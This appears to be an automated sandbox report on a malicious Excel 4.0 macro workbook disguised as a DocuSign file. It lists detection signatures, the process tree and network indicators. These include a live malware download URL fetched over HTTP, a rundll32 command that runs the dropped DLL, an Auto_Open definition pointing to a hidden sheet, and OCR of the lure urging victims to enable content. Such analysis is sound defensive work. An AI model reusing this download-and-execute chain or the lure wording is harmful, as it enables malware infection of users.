Loading ...

Play interactive tourEdit tour

Analysis Report Calculation-380472272-01262021.xlsm

Overview

General Information

Sample Name:Calculation-380472272-01262021.xlsm
Analysis ID:344642
MD5:2b6f94633c1da265ab89446858613d1e
SHA1:22a540fbff6942b60854a9d1104445999491b494
SHA256:767ef1804a87694f5be1f482d6c157dfb652e8af3e67fc6481154f36c3a98e86

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6196 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6756 cmdline: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, CommandLine: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6196, ProcessCommandLine: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, ProcessId: 6756

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://fadingmemoriespodcast.com/bdxduufm/5319402.jpgAvira URL Cloud: Label: malware

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
Source: global trafficDNS query: name: fadingmemoriespodcast.com
Source: global trafficTCP traffic: 192.168.2.4:49738 -> 35.208.103.169:80
Source: global trafficTCP traffic: 192.168.2.4:49738 -> 35.208.103.169:80
Source: global trafficHTTP traffic detected: GET /bdxduufm/5319402.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fadingmemoriespodcast.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bdxduufm/5319402.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fadingmemoriespodcast.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: fadingmemoriespodcast.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.aadrm.com/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.cortana.ai
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.office.net
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.onedrive.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://augloop.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://cdn.entity.
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://clients.config.office.net/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://config.edge.skype.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://cortana.ai
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://cortana.ai/api
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://cr.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://dev.cortana.ai
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://devnull.onenote.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://directory.services.
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://graph.windows.net
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://graph.windows.net/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://lifecycle.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://login.windows.local
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://management.azure.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://management.azure.com/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://messaging.office.com/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://officeapps.live.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://onedrive.live.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://outlook.office.com/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://outlook.office365.com/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://settings.outlook.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://staging.cortana.ai
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://tasks.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 12" from the yellow bar above 13 14" @Once You have Enable Editing, please cli
Source: Screenshot number: 4Screenshot OCR: Enable Content 15 from the yellow bar above 16 " "- Gb I " "- WHY I CANNOT OPEN THIS DOCUMENT?
Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Calculation-380472272-01262021.xlsmInitial sample: EXEC
Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9302"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="5" r:id="rId1"/><sheet name="Lodet" sheetId="4" state="hidden" r:id="rId2"/><sheet name="kOTI" sheetId="1" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Lodet!$A$154</definedName></definedNames><calcPr calcId="144525"/></workbook>
Source: classification engineClassification label: mal72.expl.evad.winXLSM@3/11@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{14290A4D-3ACE-4AAD-B1A4-D77DA7D6BB3A} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\Flopers.GGRRDDFF,DllRegisterServerJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: Calculation-380472272-01262021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
